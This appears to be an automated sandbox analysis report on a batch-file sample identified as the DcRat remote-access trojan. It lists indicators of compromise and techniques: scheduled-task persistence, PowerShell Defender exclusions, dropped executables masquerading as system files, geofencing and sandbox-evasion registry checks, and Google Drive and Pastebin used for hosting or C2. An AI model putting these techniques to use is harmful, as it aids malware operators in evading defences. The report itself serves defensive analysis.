Analysis
-
max time kernel
793s -
max time network
793s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
arch:x64arch:x86image:win10ltsc2021-20241211-enlocale:en-usos:windows10-ltsc 2021-x64system -
submitted
19-12-2024 17:51
Static task
static1
General
-
Target
Hid.bat
-
Size
42B
-
MD5
43cd3c49420b97a7e59f4505e592c497
-
SHA1
b404d304be17050293e6afbe607d507c03e48154
-
SHA256
44b7b386c2fc2a0e0e9e37e67c163f3cb5588bfd8d861315fa83ed10398538ea
-
SHA512
977b04f7cf0cf3b43ce491f661134184029c7381baeef1a920fe15c6d2b2f522f27f105a45234eb152f6073ed5adfa8db48efa2e6c9c458bf54b2c6f5e776696
Malware Config
Signatures
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Dcrat family
-
Process spawned unexpected child process 64 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5116 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1800 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1536 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6388 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2804 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1940 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5144 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5368 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 748 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4864 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4656 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2212 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2088 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1656 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 892 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3584 6256 schtasks.exe 169 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6116 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1744 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6536 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6600 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2148 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4428 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4392 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3688 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5356 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6324 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6732 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6736 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6360 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 344 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3328 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2976 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5616 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1580 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7064 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6484 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4544 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6616 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4080 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1056 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5956 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6964 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5264 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5316 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4900 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5180 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3900 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5556 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6108 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5932 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2816 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2312 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 3420 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6232 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6304 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6552 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6496 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2492 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6600 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2252 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 6564 6792 schtasks.exe 275 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2392 6792 schtasks.exe 275 -
Command and Scripting Interpreter: PowerShell 1 TTPs 64 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 5828 powershell.exe 6404 powershell.exe 4884 powershell.exe 5740 powershell.exe 6188 powershell.exe 6892 powershell.exe 5944 powershell.exe 1656 powershell.exe 2084 powershell.exe 8 powershell.exe 6920 powershell.exe 4268 powershell.exe 2424 powershell.exe 2860 powershell.exe 2060 powershell.exe 5312 powershell.exe 5612 powershell.exe 236 powershell.exe 2960 powershell.exe 5072 powershell.exe 6832 powershell.exe 5168 powershell.exe 5300 powershell.exe 1588 powershell.exe 5984 powershell.exe 5456 powershell.exe 5648 powershell.exe 5628 powershell.exe 5392 powershell.exe 2452 powershell.exe 1256 powershell.exe 6200 powershell.exe 4028 powershell.exe 4440 powershell.exe 6672 powershell.exe 6180 powershell.exe 6012 powershell.exe 6120 powershell.exe 1912 powershell.exe 6168 powershell.exe 5568 powershell.exe 4648 powershell.exe 4284 powershell.exe 4656 powershell.exe 6780 powershell.exe 2472 powershell.exe 3688 powershell.exe 4468 powershell.exe 1976 powershell.exe 6136 powershell.exe 3652 powershell.exe 5400 powershell.exe 6564 powershell.exe 1808 powershell.exe 4200 powershell.exe 6888 powershell.exe 5272 powershell.exe 3832 powershell.exe 956 powershell.exe 2736 powershell.exe 1816 powershell.exe 4060 powershell.exe 5852 powershell.exe 4044 powershell.exe -
Downloads MZ/PE file
-
A potential corporate email address has been identified in the URL: currency-file@1
-
Checks computer location settings 2 TTPs 32 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation Solaraexecutor.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation OfficeClickToRun.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation BootstrapperV1.19.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation BootstrapperV1.19.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation BootstrapperV1.23.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation PerfNET.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation services.exe Key value queried \REGISTRY\USER\S-1-5-21-114766061-2901990051-2372745435-1000\Control Panel\International\Geo\Nation WScript.exe -
Executes dropped EXE 34 IoCs
pid Process 5504 BootstrapperV1.19.exe 6768 BootstrapperV1.19.exe 1208 Solaraexecutor.exe 6212 BootstrapperV1.23.exe 6228 PerfNET.exe 6464 PerfNET.exe 1936 PerfNET.exe 5068 OfficeClickToRun.exe 3700 PerfNET.exe 6952 PerfNET.exe 4724 Registry.exe 6384 OfficeClickToRun.exe 748 PerfNET.exe 5612 PerfNET.exe 4684 PerfNET.exe 5596 PerfNET.exe 5916 PerfNET.exe 6468 PerfNET.exe 1580 PerfNET.exe 3792 PerfNET.exe 2312 PerfNET.exe 1924 services.exe 2632 services.exe 2452 services.exe 5172 services.exe 6132 services.exe 5964 services.exe 1100 services.exe 6724 services.exe 3704 services.exe 4008 services.exe 6864 services.exe 2532 services.exe 5504 services.exe -
Loads dropped DLL 11 IoCs
pid Process 4472 MsiExec.exe 4472 MsiExec.exe 6740 MsiExec.exe 6740 MsiExec.exe 6740 MsiExec.exe 6740 MsiExec.exe 6740 MsiExec.exe 5124 MsiExec.exe 5124 MsiExec.exe 5124 MsiExec.exe 4472 MsiExec.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 1007 6504 msiexec.exe 1009 6504 msiexec.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\I: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 6 IoCs
flow ioc 272 drive.google.com 273 drive.google.com 274 drive.google.com 275 drive.google.com 991 pastebin.com 992 pastebin.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File created C:\Program Files\nodejs\node_modules\npm\node_modules\normalize-package-data\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmfund\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\intersects.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\vuln.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\make-fetch-happen\lib\pipeline.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\depd\lib\compat\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\strip-ansi\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-edit.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\validate-npm-package-license\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\index.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\color-support\bin.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\emoji-regex\es2015\text.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\debug\src\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\using-npm\workspaces.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmdiff\lib\should-print-patch.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\nopt\lib\nopt.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\line.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\content\read.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-lambda\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\node_modules\glob\sync.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\diff\array.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\minimatch\dist\mjs\index.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\tests.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\rimraf\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\wide-align\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\inflight\inflight.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-prefix.1 msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\signature.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\events\tests\method-names.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmorg\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\mkdirp\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minimatch\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\base64-js\base64js.min.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\indent-string\index.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\is-lambda\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\internal\streams\state.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\error.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\abort-controller\browser.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\extendStringPrototype.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\lib\stream.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\role.d.ts msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\@npmcli\fs\lib\rm\polyfill.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmhook\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\inflight\LICENSE msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\min-version.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\agentkeepalive\lib\https_agent.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\cacache\lib\content\path.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\x509\asn1\parse.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-help-search.html msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\edge.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\glob\node_modules\minimatch\lib\path.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\readable-stream\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\identity\ci.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\dist\selectors\className.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\bin-links\lib\link-gently.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\using-npm\scripts.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\gauge\lib\theme-set.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\pacote\lib\file.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\gauge\lib\index.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-root.md msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\random.js msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\nopt\package.json msiexec.exe File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\functions\sort.js msiexec.exe -
Drops file in Windows directory 32 IoCs
description ioc Process File opened for modification C:\Windows\Panther\UnattendGC\setuperr.log UserOOBEBroker.exe File opened for modification C:\Windows\Installer\MSI4233.tmp msiexec.exe File created C:\Windows\Registration\CRMLog\sppsvc.exe PerfNET.exe File opened for modification C:\Windows\Installer\MSI3C35.tmp msiexec.exe File created C:\Windows\Installer\e5d2580.msi msiexec.exe File created C:\Windows\Branding\dllhost.exe PerfNET.exe File opened for modification C:\Windows\Panther\UnattendGC\diagerr.xml UserOOBEBroker.exe File created C:\Windows\L2Schemas\notepad.exe PerfNET.exe File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File opened for modification C:\Windows\Installer\MSI2ACD.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI4213.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI5E38.tmp msiexec.exe File opened for modification C:\Windows\SystemTemp chrome.exe File created C:\Windows\Registration\CRMLog\0a1fd5f707cd16 PerfNET.exe File opened for modification C:\Windows\Installer\MSI2A3F.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI607C.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI62B0.tmp msiexec.exe File created C:\Windows\L2Schemas\e9db699ef0888f PerfNET.exe File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} msiexec.exe File opened for modification C:\Windows\Installer\MSI5EA6.tmp msiexec.exe File opened for modification C:\Windows\Panther\UnattendGC\setupact.log UserOOBEBroker.exe File opened for modification C:\Windows\Panther\UnattendGC\diagwrn.xml UserOOBEBroker.exe File opened for modification C:\Windows\Installer\e5d257c.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon msiexec.exe File created C:\Windows\Branding\5940a34987c991 PerfNET.exe File created C:\Windows\Installer\e5d257c.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI2AFD.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3A30.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI3C65.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language FileCoAuth.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language BootstrapperV1.19.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Solaraexecutor.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MsiExec.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wevtutil.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 10 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 4852 PING.EXE 5876 PING.EXE 5200 PING.EXE 3080 PING.EXE 6068 PING.EXE 6140 PING.EXE 3596 PING.EXE 2408 PING.EXE 2812 PING.EXE 7084 PING.EXE -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000 taskmgr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A taskmgr.exe -
Checks processor information in registry 2 TTPs 16 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 taskmgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 556 ipconfig.exe -
Modifies data under HKEY_USERS 5 IoCs
